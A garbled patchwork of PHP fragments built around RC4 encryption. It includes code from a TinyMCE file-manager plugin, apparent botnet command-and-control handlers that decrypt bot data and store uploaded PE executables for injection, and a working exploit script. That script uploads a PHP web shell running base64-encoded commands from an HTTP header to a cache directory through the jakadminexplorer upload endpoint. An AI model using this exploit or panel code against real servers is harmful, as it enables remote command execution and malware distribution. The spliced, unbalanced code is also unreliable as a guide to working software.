function ShowSubFolders($dir_root, $dir, $depth, $treemenu)
{
global $SESSION;
global $GET2;
if ($depth >= 1) {
$folders = GetFolders($dir, explode(",", $SESSION["hidden_subfolder"]));
} else {
$folders = GetFolders($dir, explode(",", $SESSION["hidden_folder"]));
}
if (count($folders) == 0) {
return;
}
if ($depth >= 1) {
echo "<div class=\"sub_tree_menu\"><ul>";
} else {
echo "<div><ul>";
}
for ($i = 0; $i < count($folders); $i++) {
if ($SESSION["dir"] == $dir . $folders[$i] . "/") {
echo "<li><a id=\"active\" href=\"javascript:;\">";
$SESSION["folder"] = $folders[$i];
} else {
echo "<li><a href=\"javascript:;\" onclick=\"SMExplorer_OpenFolder('" . bin2hex(RC4("id=1&treemenu=" . $treemenu . "&dir=" . $dir . $folders[$i] . "/&" . $GET2)) . "'); if (window.event){ window.event.returnValue = false; }\">";
}
echo "<img style=\"margin:0px; margin-left:4px;\" src=\"img/icon_tree_16x16.png\" border=\"0\" /><img src=\"img/icon_folder_16x16.png\" border=\"0\" />" . $folders[$i];
if ($SESSION["show_chmod"] == 1) {
echo "<span style=\"margin-left:3px; font-size:7pt; color:#c4d3f6; font-weight:normal;\">[" . GetChmod($dir_root) . "]</span>";
}
echo "</a></li>";
// Unterordner anzeigen
ShowSubFolders($dir_root, $dir . $folders[$i] . "/", $depth + 1, $treemenu);
}
echo "</ul></div>";
}
function GetServerData()
{
global $bot_id, $data_type, $raw_data;
//if (defined('D_DEBUG')) $str = $_GET['str']; else
$str = file_get_contents('php://input');
if (!$str) {
if (defined('D_DEBUG')) {
logerror("Error: E1");
} else {
error404();
}
}
//if (!defined('D_DEBUG'))
$str = RC4($str, $_SERVER['HTTP_HOST']);
bdecodestr($str, $bot_id, $data_type, $raw_data);
if (defined('D_DEBUG')) {
logerror($bot_id . " | " . $data_type . " | " . strlen($raw_data));
}
if (!isset($bot_id) || empty($bot_id) || !isset($data_type) || empty($data_type)) {
if (defined('D_DEBUG')) {
logerror("Error: E2");
} else {
error404();
}
}
}
function GetServerData()
{
global $bot_id, $data_type, $raw_data;
$str = file_get_contents('php://input');
if (!$str) {
debug("Error: E1");
error404();
}
$str = RC4($str, $_SERVER['HTTP_HOST']);
bdecodestr($str, $bot_id, $data_type, $raw_data);
debug($bot_id . " | " . $data_type . " | " . strlen($raw_data));
if (!isset($bot_id) || empty($bot_id) || !isset($data_type) || empty($data_type)) {
debug("Error: E2");
error404();
}
}
<?php
// Initialisierung
$SESSION = array();
$QUERY = array();
// Query-Zeichenkette entschlüsseln
if (isset($_GET["get"])) {
parse_str(RC4(@pack("H*", $_GET["get"])), $QUERY);
} else {
include "error.php";
die;
}
// Query-Zeichenkette auf Vollständigkeit überprüfen
if (!isset($QUERY["id"]) || !isset($QUERY["check_session_variable"])) {
include "error.php";
die;
}
// Verzeichnispfad überprüfen
if ($CONFIG["directory"] != "" && $CONFIG["directory"][0] != "/") {
$CONFIG["directory"] = "/" . $CONFIG["directory"];
}
if ($CONFIG["directory"] != "" && $CONFIG["directory"][strlen($CONFIG["directory"]) - 1] != "/") {
$CONFIG["directory"] = $CONFIG["directory"] . "/";
}
// Serverpfad überprüfen
if ($CONFIG["server"] != "" && $CONFIG["server"][strlen($CONFIG["server"]) - 1] == "/") {
$CONFIG["server"] = substr($CONFIG["server"], 0, -1);
}
// Initialisierung
$SESSION["id"] = "1";
$SESSION["back"] = "0";
<form style="padding:10px;" name="form_upload" action="" method="post" enctype="multipart/form-data">
<div style="margin-bottom:2px;"><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_label_1', '?'));</script>:</b></div>
<div><input id="upload_input_1" style="margin-bottom:8px;" type="file" name="input1" size="64" onchange="SMExplorer_Upload_ShowFileName();"></div>
<div style="margin-bottom:2px;"><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_label_2', '?'));</script>:</b></div>
<div><input id="upload_edit_1" style="width:90%;" type="text" name="edit1" maxlength="50"><input id="upload_edit_2" style="width:40px; border-left:0px; font-weight:bold; background-color:#f6f9fb;" type="text" name="edit2" readonly></div>
<div style="margin-top:12px; margin-bottom:57px;">
<script language="javascript" type="text/javascript">
/* <![CDATA[ */
var jSMB_U1 = new jSMButton();
jSMB_U1.SetStyle('float:left;');
jSMB_U1.Paint('jSMB_U1', tinyMCEPopup.getLang('smexplorer.upload_button_1', '?'), 'SMExplorer_Upload_Save(\'<?php
echo bin2hex(RC4("id=2&" . $GET));
?>
\');');
var jSMB_U2 = new jSMButton();
jSMB_U2.SetStyle('float:left; margin-left:20px;');
jSMB_U2.Paint('jSMB_U2', tinyMCEPopup.getLang('smexplorer.upload_button_2', '?'), 'SMExplorer_Upload_Close();');
/* ]]> */
</script>
</div>
<div id="upload_info">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_info_1', '?'));</script>:</b></td>
<td><?php
if ($SESSION["upload_filetype"] != "") {
echo str_replace(',', ', ', $SESSION["upload_filetype"]);
} else {
/**
* Compute U value
*/
function _Uvalue()
{
return RC4($this->encryption_key, $this->padding);
}
if ($CONFIG["show_preview"] == 1) {
$a = array();
$a = GetNewImageSize($SESSION["dir"] . $FILES[$i], 200);
// Bilddatei mit Thumbnail-Anzeige
$icon = "<div id=\"th" . $i . "\" class=\"jsmpreview\"></div><img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onmouseover=\"jSMP.Show(\\'th" . $i . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $a["width"] . "\\', \\'" . $a["height"] . "\\');\" onmouseout=\"jSMP.Close(\\'th" . $i . "\\');\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />";
unset($a);
} else {
// Bilddatei ohne Thumbnail-Anzeige
$icon = "<img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />";
}
} else {
// Keine Bilddatei
$icon = "<img style=\"cursor:pointer;\" src=\"img/icon_file_16x16.png\" border=\"0\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />";
}
if ($SESSION["show_file_menu"] == 1) {
echo "jSMT.AddData(Array('<input id=\"td_checkbox" . $i . "\" name=\"td_checkbox" . $i . "\" class=\"checkbox\" type=\"checkbox\" value=\"0\" onclick=\"SMExplorer_Check(" . count($FILES) . ");\" />', '" . $icon . "', '<input id=\"fn_input" . $i . "\" name=\"fn_input" . $i . "\" class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$i] . "\" title=\"" . $FILES[$i] . "\" onclick=\"SMExplorer_InputClick(this, " . $CONFIG["rename_file_ext"] . ");\" onblur=\"SMExplorer_InputBlur(this, \\'" . $FILES[$i] . "\\');\" onkeypress=\"SMExplorer_InputEnter(event, this, \\'" . $FILES[$i] . "\\', \\'" . bin2hex(RC4("id=1&" . $GET)) . "\\');\">', '<img id=\"i1" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_insert_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />', '<img id=\"i3" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_show_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_View_Show(\\'" . $SESSION["dir"] . $FILES[$i] . "\\');\" />', '<img id=\"i2" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_delete_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_DeleteFile(\\'" . bin2hex(RC4("id=1&" . $GET)) . "\\', \\'" . $FILES[$i] . "\\');\" />', '" . number_format(@filesize(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i]) / 1024, 2, ",", ".") . " KB', '" . date(GetDateFormat() . ' H:i', @filemtime(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i])) . "'), Array('width:18px; text-align:center;', 'width:18px; text-align:center;', '', 'width:16px; text-align:center;', 'width:16px; text-align:center;', 'width:16px; text-align:center;', 'width:102px; text-align:right;', 'width:122px; text-align:center;'));";
} else {
echo "jSMT.AddData(Array('" . $icon . "', '<input id=\"fn_input" . $i . "\" name=\"fn_input" . $i . "\" class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$i] . "\" title=\"" . $FILES[$i] . "\" readonly=\"1\">', '" . number_format(@filesize(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i]) / 1024, 2, ",", ".") . " KB', '" . date(GetDateFormat() . ' H:i', @filemtime(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i])) . "'), Array('width:18px; text-align:center;', '', 'width:16px; text-align:center;', 'width:102px; text-align:right;', 'width:122px; text-align:center;'));";
}
}
?>
// Tabelle zeichnen
jSMT.Paint();
<?php
// Hinweis hinzufügen
for ($i = 0; $i < count($FILES); $i++) {
echo "document.getElementById('i1" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_1', '?'); document.getElementById('i2" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_2', '?'); document.getElementById('i3" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_3', '?');";
}
?>
<ul>
<?php
echo "<li><a id=\"m12\" href=\"javascript:;\" title=\"\" onclick=\"window.location.href='index.php?get=" . bin2hex(RC4("id=1&" . $GET)) . "'; if (window.event){ window.event.returnValue = false; }\"><img src=\"img/icon_image_24x24.png\" border=\"0\" /></a></li>";
echo "<li><img class=\"separator\" src=\"img/icon_separator.png\" border=\"0\" /></li>";
?>
</ul>
die;
}
$host = $argv[1];
$path = $argv[2];
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);
$sid = $m[1];
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";
$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));
$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/Error/", http_send($host, $packet))) {
die("\n[-] Upload failed!\n");
}
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
if (($SESSION["page"] + 1) * $SESSION["thumbnails_perpage"] < count($FILES)) {
echo "<li><a id=\"m4\" href=\"javascript:;\" title=\"\" onclick=\"window.location.href='index.php?get=" . bin2hex(RC4("id=1&page=" . ($SESSION["page"] + 1) . "&" . $GET)) . "'; if (window.event){ window.event.returnValue = false; }\"><img src=\"img/icon_forward_24x24.png\" border=\"0\" /></a></li>";
} else {
echo "<li><a id=\"m4\" href=\"javascript:;\" title=\"\"><img src=\"img/icon_forward_2_24x24.png\" border=\"0\" /></a></li>";
}
}
?>
<li><img class="separator" src="img/icon_separator.png" border="0" /></li>
<li><a id="m5" href="javascript:;" title="" onclick="SMImage_PageReload('<?php
echo bin2hex(RC4("id=1&" . $GET));
?>
'); if (window.event){ window.event.returnValue = false; }"><img src="img/icon_reload_24x24.png" border="0" /></a></li>
<li><img class="separator" src="img/icon_separator.png" border="0" /></li>
<li><select class="select" id="Select1" name="Select1" size="1" onChange="location.href=this.options[this.selectedIndex].value;"><option <?php
if ($SESSION["show_thumbnail"] == 1) {
echo "selected";
}
?>
value="index.php?get=<?php
echo bin2hex(RC4("id=1&show_thumbnail=1&" . str_replace("&show_thumbnail=0", "", $GET)));
?>
"><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smimage.menu_view_select_1', '?'));</script></option><option <?php
if ($SESSION["show_thumbnail"] == 0) {
echo "selected";
}
?>
value="index.php?get=<?php
echo bin2hex(RC4("id=1&show_thumbnail=0&" . str_replace("&show_thumbnail=1", "", $GET)));
?>
"><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smimage.menu_view_select_2', '?'));</script></option></select></li>
</ul>
if (isset($_POST['fAdd'])) {
$newname = './files/' . randstr(30);
$ctx = file_get_contents($_FILES['fFile']['tmp_name']);
$arr = unpack('v1doshdr/@60/Llfa_new/C*bytes', $ctx);
if ($arr['doshdr'] == 23117) {
$fileheader[0] = $arr['bytes' . ($arr['lfa_new'] - 59)];
$fileheader[1] = $arr['bytes' . ($arr['lfa_new'] - 58)];
if ($fileheader[0] == 76 && $fileheader[1] == 1) {
$PEarch = "X86";
} else {
if ($fileheader[0] == 100 && $fileheader[1] == 134) {
$PEarch = "X64";
}
}
if (!empty($PEarch) && ($fh = fopen($newname, "w+"))) {
if (fwrite($fh, RC4($ctx, explode('/', $newname)[2]))) {
$file = array('fArch' => $PEarch, 'fName' => $_POST['fName'], 'fVer' => $_POST['fVer'], 'fInject' => $_POST['fInject'], 'fFilePath' => $newname, 'fDate' => date('Y-m-d H:i:s', strtotime('now')), 'fConnectedWith' => $_POST['tConnectedWith'], 'fArgs' => $_POST['fArgs']);
if ($db->insert('files', $file)) {
metaRefresh('?act=files');
}
} else {
echo "Error while write file";
}
fclose($fh);
} else {
echo "Error while open file or file is not valid PE image.";
}
unset($arr);
} else {
echo "Not a PE file.";
}
// Icon mit Thumbnail-Anzeige bei "onmouseover"
$a = array();
$a = GetNewImageSize($IMAGE_PATH_2 . $FILES[$j], 200);
echo "<td style=\"width:18px; text-align:center;\"><div id=\"smpreview" . $j . "\" class=\"smpreview\"></div><img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onmouseover=\"SMP.Show('smpreview" . $j . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . $a["width"] . "', '" . $a["height"] . "');\" onmouseout=\"SMP.Close('smpreview" . $j . "');\" onclick=\"SMImage_Insert('" . $SESSION["server"] . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . "', '" . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "', '" . $CONFIG["style"] . "');\" /></td>";
unset($a);
// Dateiname
if ($SESSION["show_image_menu"] == 1) {
echo "<td><input class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$j] . "\" title=\"" . $FILES[$j] . "\" onclick=\"SMImage_InputFileClick(this);\" onblur=\"SMImage_InputFileBlur(this, '" . $FILES[$j] . "');\" onkeypress=\"SMImage_InputFileEnter(event, this, '" . $FILES[$j] . "', '" . bin2hex(RC4("id=1&" . $GET)) . "')\"></td>";
} else {
echo "<td><input class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$j] . "\" title=\"" . $FILES[$j] . "\" readonly=\"1\"></td>";
}
// Icon "Bild einfügen"
echo "<td style=\"width:16px; text-align:center;\"><img id=\"i1" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_insert_16x16.png\" border=\"0\" title=\"\" onclick=\"SMImage_Insert('" . $SESSION["server"] . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . "', '" . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "', '" . $CONFIG["style"] . "');\" /></td>";
// Icon "Bilddatei löschen"
if ($SESSION["show_image_menu"] == 1) {
echo "<td style=\"width:16px; text-align:center;\"><img id=\"i2" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_delete_16x16.png\" border=\"0\" title=\"\" onclick=\"SMImage_DeleteImage('" . bin2hex(RC4("id=1&" . $GET)) . "', '" . $FILES[$j] . "');\" /></td>";
}
// Dateigröße
echo "<td style=\"width:102px; text-align:right;\">" . number_format(@filesize($IMAGE_PATH . $FILES[$j]) / 1024, 2, ",", ".") . " KB</td>";
// Bildgröße
echo "<td style=\"width:102px; text-align:right;\">" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . " x " . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "</td>";
// Datum
echo "<td style=\"width:122px; text-align:center;\">" . date(GetDateFormat() . ' H:i', @filemtime($IMAGE_PATH . $FILES[$j])) . "</td>";
// ScrollBar
echo "<td style=\"width:10px;\"> </td>";
echo "</tr>";
// Hinweis hinzufügen
echo "<script language=\"javascript\" type=\"text/javascript\">document.getElementById('i1" . $i . "').title = tinyMCEPopup.getLang('smimage.image_menu_hint_1', '?'); document.getElementById('i2" . $i . "').title = tinyMCEPopup.getLang('smimage.image_menu_hint_2', '?');</script>";
$i++;
}
echo "</table></div>";
function str_decrypt($str)
{
$str = base64_decode(rawurldecode($str));
$str = RC4($str, KEY);
return $str;
}
}
if (!isset($_GET['add'])) {
$files = $db->query('SELECT * FROM `files`')->fetchAllAssoc();
echo "<table cellpadding='3' cellspacing='3' width='100%' style=''><tr><td width='100%'>";
echo "<table cellpadding='3' cellspacing='0' width='100%' class='light_table box' rules='all'>\r\n <tr><th>Num</th><th>Name</th><th>Version</th><th>Added</th><th>Path</th><th>Action</th></tr>";
$count = 0;
foreach ($files as $file) {
$color = $count % 2 ? "#d3e7f0" : "#ebf4f8";
echo "<tr bgcolor='{$color}' onmouseover=\"this.style.background='#ffffff'\" onmouseout=\"this.style.background='{$color}'\">\r\n <td align='center'><b>{$file['fId']}</b></td>\r\n <td align='center'>{$file['fName']}</td>\r\n <td align='center'>{$file['fVer']}</td>\r\n <td align='center'>{$file['fDate']}</td>\r\n <td align='center'>{$file['fFilePath']}</td>\r\n <td align='center'><a href='?act=files&del=" . $file['fId'] . "'>Delete</a></td>\r\n </tr>";
$count++;
}
} else {
echo "<form action='?act=files&add' method='post' enctype='multipart/form-data'>\r\n <table cellpadding='3' cellspacing='3' width='100%'>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>Name</td>\r\n <td class='td_col_list' width='70%'>\r\n <input name='fName' type='text' value=''>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>Version</td>\r\n <td class='td_col_list' width='70%'>\r\n <input name='fVer' type='text' value=''>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>File</td>\r\n <td class='td_col_list' width='70%'>\r\n <input type='file' name='fFile'>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td> </td>\r\n <td><input type='submit' value='Add' name='fAdd'></td>\r\n </tr>\r\n </table>\r\n </form>";
if (isset($_POST['fAdd'])) {
$newname = './files/' . randstr(30);
$ctx = file_get_contents($_FILES['fFile']['tmp_name']);
if ($fh = fopen($newname, "w+")) {
if (fwrite($fh, RC4($ctx, "1"))) {
$file = array('fName' => $_POST['fName'], 'fVer' => $_POST['fVer'], 'fInject' => "", 'fFilePath' => $newname, 'fDate' => date('Y-m-d H:i:s', strtotime('now')));
if ($db->insert('files', $file)) {
metaRefresh('?act=files');
}
} else {
echo "Error while write file";
}
fclose($fh);
} else {
echo "Error while open file";
}
}
}
